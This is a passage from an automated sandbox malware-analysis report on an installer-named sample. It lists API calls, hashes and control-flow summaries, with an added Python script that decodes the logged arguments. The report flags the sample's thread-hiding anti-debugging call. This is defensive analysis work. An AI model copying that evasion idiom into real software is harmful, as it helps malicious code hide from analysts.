                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3795f7c67bd0190a7e00346d7fec6c193ca7a79583a3f1d7eadc41ed5d4c88d8
                            • Instruction ID: 445b060293cfb8b991942b2740f4eba74314493bf775da84f8e6cb3b4e6be5f8
                            • Opcode Fuzzy Hash: 3795f7c67bd0190a7e00346d7fec6c193ca7a79583a3f1d7eadc41ed5d4c88d8
                            • Instruction Fuzzy Hash: 1B32D732246B018FC324CF28C8D0695B7E7EFD131476D8A6DC0EA6BA55DB75B48ACB50
                            APIs
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 65b713e6b43c95d0d12b8c7b0d811aeef4c00b4cfae11695cb1d06200b61695e
                            • Instruction ID: bc4f29b326c97d50ba305d64d1d655d804b4d1bcfe817220a0578ee105b0686b
                            • Opcode Fuzzy Hash: 65b713e6b43c95d0d12b8c7b0d811aeef4c00b4cfae11695cb1d06200b61695e
                            • Instruction Fuzzy Hash: 7D51E231245B018FC320CF29C8807D5B7E7BF95314F6A8A5DC0EA2BA95DF75B48A8B51
                            APIs
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: fe5aad7e21608040846d62ceb7537b0a755a3c1c4ef42f03701fe995dcb47fb5
                            • Instruction ID: 91af054dc449de4c2c1db7cdc814fdb6875bc1d46852e97c0910aadb089b011a
                            • Opcode Fuzzy Hash: fe5aad7e21608040846d62ceb7537b0a755a3c1c4ef42f03701fe995dcb47fb5
                            • Instruction Fuzzy Hash: 7251E231605B018FC320CF29C480795B7FBBF95314F698A1DC0EA6BA95DF71B48A8B51
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAB3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAB3EAA
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 6610e639707c1087db37ff3b5a5d4b492f7cec53c09488b1f55b2406a55bfad8
                            • Instruction ID: 69a1b9935e815899371d8c0ed003c433e911e52ff863dc1d166d54624f659cac
                            • Opcode Fuzzy Hash: 6610e639707c1087db37ff3b5a5d4b492f7cec53c09488b1f55b2406a55bfad8
                            • Instruction Fuzzy Hash: 32310131606B01CBD720CF38C8947C6B7ABAF96314F5A4A1DC0EA6BA81DF7570899B51
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAB3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAB3EAA
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 69670f38af420033c2e05153e518c01cab77680300c92aacdb5f20e0eed12964
                            • Instruction ID: dbf6cc666cc522734dba7b1f8a3c33b2ab9ee99386bd1588fb02711d99c34fba
                            • Opcode Fuzzy Hash: 69670f38af420033c2e05153e518c01cab77680300c92aacdb5f20e0eed12964
                            • Instruction Fuzzy Hash: 1431FF31215B01CBD724CF28C490796BBFAAF96304F694E1DC0EA6BA86DF717489CB51
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAB3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAB3EAA
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: bd6219e315c33106f6389fdae2abe0d5f21c41eef7442d8eb4b339f52aa06f24
                            • Instruction ID: 23f2e5e3862fcf404b8ac9a0d7b6156e57924906278f8709c423d6d613fe790f
                            • Opcode Fuzzy Hash: bd6219e315c33106f6389fdae2abe0d5f21c41eef7442d8eb4b339f52aa06f24
                            • Instruction Fuzzy Hash: 9C210330219B01DBD724CF38C894796B7BAAF42304F594E1DD0EAABA81DF7574889B51
                            APIs
                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC38820
                            • OpenServiceA.ADVAPI32(?,?,00000004), ref: 6CC388C5
                            Similarity
                            • API ID: Open$ManagerService
                            • String ID:
                            • API String ID: 2351955762-0
                            • Opcode ID: 5341b003d628e022b94bcddcbc253b3bbabd3cfaebdde2168bd680970d14c7f8
                            • Instruction ID: a03b20a03bc65c3f3fc7b48454ce719631c33f89fb77f571f98160861c3127a9
                            • Opcode Fuzzy Hash: 5341b003d628e022b94bcddcbc253b3bbabd3cfaebdde2168bd680970d14c7f8
                            • Instruction Fuzzy Hash: C4311674608312AFD7508F29D949A0EBBF0AB8A754F54985AF888D7261E271C848CB63
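The APIs lines above record raw hexadecimal arguments, and the interesting facts are in those arguments: `NtSetInformationThread(…, 00000011, 00000000, 00000000)` at 6CAB3EAA sets ThreadInformationClass 0x11 (ThreadHideFromDebugger) with no buffer, which is the idiom behind the "Hides threads from debuggers" signature, and `OpenSCManagerA(…, 00000001)` / `OpenServiceA(?, ?, 00000004)` request only SC_MANAGER_CONNECT and SERVICE_QUERY_STATUS, i.e. a service-status check rather than service creation. The following script is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses lines in the report's APIs format into structured calls, decodes the thread-information class and the service access masks from the Windows SDK constants, and flags the hide-from-debugger call. The sample lines are copied from the sections above; the constant tables are from winsvc.h and the documented THREADINFOCLASS enumeration.

```python
"""Decode the 'APIs' lines of a Joe Sandbox report into named Windows constants.

Added triage example; it is not part of the Joe Sandbox report or of the
analysed sample. SAMPLE_LINES are copied from the report's APIs sections;
the constant tables come from the Windows SDK (winsvc.h) and the documented
THREADINFOCLASS enumeration.
"""
import re
from dataclasses import dataclass

# Constructed input: the APIs lines as they appear in the report sections above.
SAMPLE_LINES = [
    "GetCurrentThread.KERNEL32 ref: 6CAB3E9D",
    "NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAB3EAA",
    "OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC38820",
    "OpenServiceA.ADVAPI32(?,?,00000004), ref: 6CC388C5",
    "FindFirstFileA.KERNEL32(?,?), ref: 6CC2E0AC",
    "WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 6CC0B62F",
]

# Line format: Api.MODULE(arg,arg,...), ref: ADDRESS   (the argument list is optional)
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)

# THREADINFOCLASS values relevant to NtSetInformationThread (decimal 17 and 18).
THREADINFOCLASS = {0x11: "ThreadHideFromDebugger", 0x12: "ThreadBreakOnTermination"}

# Access-right bits for the two service-control handle types (winsvc.h).
SC_MANAGER_RIGHTS = {
    0x0001: "SC_MANAGER_CONNECT", 0x0002: "SC_MANAGER_CREATE_SERVICE",
    0x0004: "SC_MANAGER_ENUMERATE_SERVICE", 0x0008: "SC_MANAGER_LOCK",
    0x0010: "SC_MANAGER_QUERY_LOCK_STATUS", 0x0020: "SC_MANAGER_MODIFY_BOOT_CONFIG",
}
SERVICE_RIGHTS = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # one int per argument, None where the sandbox printed '?'
    ref: int     # address of the call instruction


def parse_api_line(line: str) -> ApiCall:
    """Parse one report line; raise ValueError for anything in another format."""
    m = LINE_RE.match(line.strip())
    if m is None:
        raise ValueError(f"unrecognised API line: {line!r}")
    args = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def decode_mask(value: int, table: dict) -> list:
    """Split an access mask into named bits; bits not in the table stay as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)   # the keys are disjoint bits, so sum == OR
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def describe(call: ApiCall) -> str:
    """Human-readable summary of one call using the tables above."""
    a = call.args
    if call.api == "NtSetInformationThread" and len(a) >= 2 and a[1] is not None:
        return f"{call.api}: {THREADINFOCLASS.get(a[1], f'class 0x{a[1]:X}')}"
    if call.api == "OpenSCManagerA" and len(a) == 3 and a[2] is not None:
        return f"{call.api}: access {'|'.join(decode_mask(a[2], SC_MANAGER_RIGHTS))}"
    if call.api == "OpenServiceA" and len(a) == 3 and a[2] is not None:
        return f"{call.api}: access {'|'.join(decode_mask(a[2], SERVICE_RIGHTS))}"
    return f"{call.api}: {len(a)} argument(s) logged"


def find_hidden_thread_calls(lines: list) -> list:
    """Return the refs of NtSetInformationThread(h, ThreadHideFromDebugger, NULL, 0).

    That argument shape (class 0x11, no buffer, length 0) is the anti-debug
    idiom: after it succeeds a debugger receives no more events for the thread.
    """
    hits = []
    for line in lines:
        c = parse_api_line(line)
        if c.api == "NtSetInformationThread" and c.args[1:] == [0x11, 0, 0]:
            hits.append(c.ref)
    return hits


if __name__ == "__main__":
    for raw in SAMPLE_LINES:
        call = parse_api_line(raw)
        print(f"{call.ref:08X}  {describe(call)}")
    print("ThreadHideFromDebugger at:",
          [f"{r:08X}" for r in find_hidden_thread_calls(SAMPLE_LINES)])
```

Run against the six lines it prints the decoded class for 6CAB3EAA and the decoded access masks for the two service calls; `?` arguments are kept as `None` rather than guessed, so a line such as `OpenServiceA(?,?,00000004)` still yields the access mask without inventing the handle or service name.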
                            APIs
                            • FindFirstFileA.KERNEL32(?,?), ref: 6CC2E0AC
                            • FindClose.KERNEL32(000000FF), ref: 6CC2E0E2
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: a4443f7e0e0887f3f024607543da120af766c9a895c203ed8b4a2b547fac29cd
                            • Instruction ID: f87fa621377b2d20d0039706c34a2ce8aeaece64242e525256ac877252f12c00
                            • Opcode Fuzzy Hash: a4443f7e0e0887f3f024607543da120af766c9a895c203ed8b4a2b547fac29cd
                            • Instruction Fuzzy Hash: DE113D7450C751EFC7108F38C94494ABBF4AB86315F144D5EF4A8D7790EB38D88A9B82

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph (rendered graph; edge list omitted): basic blocks 6cc501c3-6cc50572, entry at 6cc501c3; Win32 calls: GetConsoleMode (6cc50447), ReadConsoleW (6cc5045e), GetLastError (6cc5047a, 6cc5051c), ReadFile (6cc504a8); internal calls to 6cc430bc, 6cc430cf, 6cc430e2, 6cc43810, 6cc47eab, 6cc47ee5, 6cc4e359, 6cc505ee, 6cc50573, 6cc508a6, 6cc550d5.
                            Strings
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: bdcf20138793cf6b7ee1170d7e4a48b1a583c193a2ec8630eb9d4e6663de0fb4
                            • Instruction ID: 7dd3a133d115404772ee126a84ecc54ba401d6ea06fb7bf277a02ba6b2900ce4
                            • Opcode Fuzzy Hash: bdcf20138793cf6b7ee1170d7e4a48b1a583c193a2ec8630eb9d4e6663de0fb4
                            • Instruction Fuzzy Hash: 26C12470E042859FDF01CF99C880BADBBB4BF4A31CF948159E514EBB81E7318965CB69

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph (rendered graph; edge list omitted): basic blocks 6cc5775c-6cc57a85, entry at 6cc5775c; Win32 calls: GetFileType (6cc57882), GetLastError (6cc57857, 6cc5788d, 6cc57a35), CloseHandle (6cc5788d-6cc578be, 6cc57a00); internal calls to 6cc57bdc, 6cc54cfc, 6cc57b47 (which calls CreateFileW), 6cc430bc, 6cc430cf, 6cc430e2, 6cc54ea0, 6cc57d56, 6cc57e00, 6cc4f015, 6cc54e0f.
                            APIs
                              • Part of subcall function 6CC57B47: CreateFileW.KERNEL32(00000000,00000000,?,6CC57805,?,?,00000000,?,6CC57805,00000000,0000000C), ref: 6CC57B64
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC57870
                            • __dosmaperr.LIBCMT ref: 6CC57877
                            • GetFileType.KERNEL32(00000000), ref: 6CC57883
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC5788D
                            • __dosmaperr.LIBCMT ref: 6CC57896
                            • CloseHandle.KERNEL32(00000000), ref: 6CC578B6
                            • CloseHandle.KERNEL32(6CC4E7C0), ref: 6CC57A03
                            • GetLastError.KERNEL32 ref: 6CC57A35
                            • __dosmaperr.LIBCMT ref: 6CC57A3C
                            Strings
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: 8Q
                            • API String ID: 4237864984-4022487301
                            • Opcode ID: ef8b0bae724a96263f14a164b41e00cf67f19ef7ac56204c1dd9f6f3977617af
                            • Instruction ID: 909ef90deee0d6feaa42d08bb1e556298b384e85a5b653dab81e7e8f7f54e06d
                            • Opcode Fuzzy Hash: ef8b0bae724a96263f14a164b41e00cf67f19ef7ac56204c1dd9f6f3977617af
                            • Instruction Fuzzy Hash: 62A13532A241048FCF098F68CC91BED7BB1AB47328F58824AE811EF390E7358976D755
                            APIs
                            • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 6CC0B62F
                            Strings
                            Similarity
                            • API ID: FileWrite
                            • String ID: *$,=ym$-=ym$-=ym$B$H
                            • API String ID: 3934441357-3163594065
                            • Opcode ID: 2604d77ed172de3d276cc1aae07752c6a3fd583ceef924029ff7069e249694d9
                            • Instruction ID: 4d71989bd0710e6776b246a894a84bb1ece4685178e75583878ea1240969d189
                            • Opcode Fuzzy Hash: 2604d77ed172de3d276cc1aae07752c6a3fd583ceef924029ff7069e249694d9
                            • Instruction Fuzzy Hash: FB729B746093459FCB24CF29C4A065ABBE1BF89304F188E5EE499CBB50E736D885CB53
                            Strings
                            Similarity
                            • API ID:
                            • String ID: ;T55
                            • API String ID: 0-2572755013
                            • Opcode ID: beb00db9d402cca1c853ee21b6d13fbeb7a6a8bebff811ad32ba6155075859bf
                            • Instruction ID: a48a5958d9753ea6113ff4bc5dfac1ef6ea0ce1241e7d747506c569b113f6577
                            • Opcode Fuzzy Hash: beb00db9d402cca1c853ee21b6d13fbeb7a6a8bebff811ad32ba6155075859bf
                            • Instruction Fuzzy Hash: D703C131745B018FC728CF28C8D0696B7F2AFD532471D8B6DC0AA4BA95DB74B48ACB51

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph (rendered graph; edge list omitted): basic blocks 6cc386e0-6cc38807, entry at 6cc386e0; CreateProcessA in the entry block (6cc386e0-6cc38767); WaitForSingleObject and two CloseHandle calls in block 6cc387b0-6cc387fa, which branches back to 6cc3878b.
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CloseHandle$CreateObjectProcessSingleWait
                            • String ID: D
                            • API String ID: 2059082233-2746444292
                            • Opcode ID: c7bdadb915c58a0cb57fd6737435e2c696ec550452de6753749c4b588a7f0812
                            • Instruction ID: 1a9f9a4016cd582fd6362c23accd5782c3e1d41c9cd32d0b7712f8c31c861b7a
                            • Opcode Fuzzy Hash: c7bdadb915c58a0cb57fd6737435e2c696ec550452de6753749c4b588a7f0812
                            • Instruction Fuzzy Hash: BF31E371809740CFD750DF29D188B1ABBF0AB9A318F516A1EF8E986350E7749584CF43

                            Control-flow Graph
                            (rendered graph omitted; basic blocks 6cc4f34e-6cc4f52f, API calls: WriteFile, GetLastError, plus internal subcalls)
                            APIs
                              • Part of subcall function 6CC4F5A1: GetConsoleCP.KERNEL32(?,6CC4E7C0,?), ref: 6CC4F5E9
                            • WriteFile.KERNEL32(?,?,6CC57DDC,00000000,00000000,?,00000000,00000000,6CC591A6,00000000,00000000,?,00000000,6CC4E7C0,6CC57DDC,00000000), ref: 6CC4F49F
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC57DDC,6CC4E7C0,00000000,?,?,?,?,00000000,?), ref: 6CC4F4A9
                            • __dosmaperr.LIBCMT ref: 6CC4F4EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                            • String ID: 8Q
                            • API String ID: 251514795-4022487301
                            • Opcode ID: 7f406034f7486bd31f6bd8e44afbd7465296386f8a3412f229e70ec6573f67f6
                            • Instruction ID: fee724355b948132999694805587c26225408b99c135a6c35bab79335b5e3e27
                            • Opcode Fuzzy Hash: 7f406034f7486bd31f6bd8e44afbd7465296386f8a3412f229e70ec6573f67f6
                            • Instruction Fuzzy Hash: D551F671A0010AAFEB01CFA9C880BEEBBB9FF4A358F14D551E510ABA41F770D945CB61

                            Control-flow Graph
                            (rendered graph omitted; basic blocks 6cc39280-6cc39439, internal subcalls only, no direct Win32 API calls in the graph)
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC39421
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 323602529-1866435925
                            • Opcode ID: 3882c10eadea1b5302492fe116a5ac031cd0fd6276986634af69e4801a072124
                            • Instruction ID: d980beb2ed7e1277b4cd761db395c9934b76ed57a13bac096aed61dd653319b9
                            • Opcode Fuzzy Hash: 3882c10eadea1b5302492fe116a5ac031cd0fd6276986634af69e4801a072124
                            • Instruction Fuzzy Hash: 345145B5500B008FD725CF25C585B97BBF1BB89318F448A2DD8864BB90E775B909CF90

                            Control-flow Graph
                            (rendered graph omitted; basic blocks 6cc0cea0-6cc0d1c0, API calls: WriteFile x3, ReadFile, plus internal subcalls)
                            APIs
                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CC0CFE1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 220d09d305b559261c85d4e9edd41b8c8bddb702cbdf180569fb66ac94156e72
                            • Instruction ID: 07d25f56630cf37206428a0fc771ea0f32935f62cc2f947cd5b98731b855dd8d
                            • Opcode Fuzzy Hash: 220d09d305b559261c85d4e9edd41b8c8bddb702cbdf180569fb66ac94156e72
                            • Instruction Fuzzy Hash: F0714DB0209345AFD710DF19C884B5ABBF4BF89708F50492EF598C7690E776D9848B93

                            Control-flow Graph
                            (rendered graph omitted; basic blocks 6cc0c390-6cc0ce47, API calls: CreateFileA, plus internal subcalls)
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @*Z$@*Z
                            • API String ID: 0-2842812045
                            • Opcode ID: 20ea75f8208d917bdad5307222d81d32e5bf9d5756741afe3df4f6080fd56dc2
                            • Instruction ID: d02d28f4a54008bee8536ec1b8dd94faaf6175b95e9ff9cfb7a4073516bf7763
                            • Opcode Fuzzy Hash: 20ea75f8208d917bdad5307222d81d32e5bf9d5756741afe3df4f6080fd56dc2
                            • Instruction Fuzzy Hash: AA4267706093428FCB14DF58C49166ABBE1BB89308F644D6EF49AC7B61E332D945CB23

                            Control-flow Graph
                            (rendered graph omitted; basic blocks 6cc4f015-6cc4f0b0, API calls: CloseHandle, GetLastError, plus internal subcalls)
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC5794F), ref: 6CC4F06B
                            • GetLastError.KERNEL32(?,00000000,?,6CC5794F), ref: 6CC4F075
                            • __dosmaperr.LIBCMT ref: 6CC4F0A0
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID:
                            • API String ID: 2583163307-0
                            • Opcode ID: ac7ea7c476724816c9c9527c81e3e52ac293dfc4e21a1ac6e807c68d2ec8719d
                            • Instruction ID: 7884b083eebc710465d282a60eb9f94eea3e888ecf00fec5667e28d4f3ff22f7
                            • Opcode Fuzzy Hash: ac7ea7c476724816c9c9527c81e3e52ac293dfc4e21a1ac6e807c68d2ec8719d
                            • Instruction Fuzzy Hash: 5D014E33F052202ED214523A99447AE77694BC373DF29C74AE919CBBC1FF6598674290

                            Control-flow Graph
                            (rendered graph omitted; basic blocks 6cc4428c-6cc44302, internal subcalls only, no direct Win32 API calls in the graph)
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction ID: 0269abdc885f8d396473dd98c477584bab0b03f8d190c841e78b843c17580e9f
                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction Fuzzy Hash: 20F0F432901A205AE631DE799C00BDB33A99F8237CF35CB15E92493EC0FB30D50A86E1
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC391A4
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC391E4
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID:
                            • API String ID: 323602529-0
                            • Opcode ID: 94fcb44a41b8f26372a89d2ea88a3a6d6f7718827ed551d04593cb7458ce1cc6
                            • Instruction ID: 4656128a82d73ce7c0d9f3d86fa70dec00599c963a40464b0a97e0c9e9ccfe25
                            • Opcode Fuzzy Hash: 94fcb44a41b8f26372a89d2ea88a3a6d6f7718827ed551d04593cb7458ce1cc6
                            • Instruction Fuzzy Hash: 83513871101B00DBD725CF25D984BE6BBF4BB09714F448A1CD4AE8BB91EB35B559CB80
                            APIs
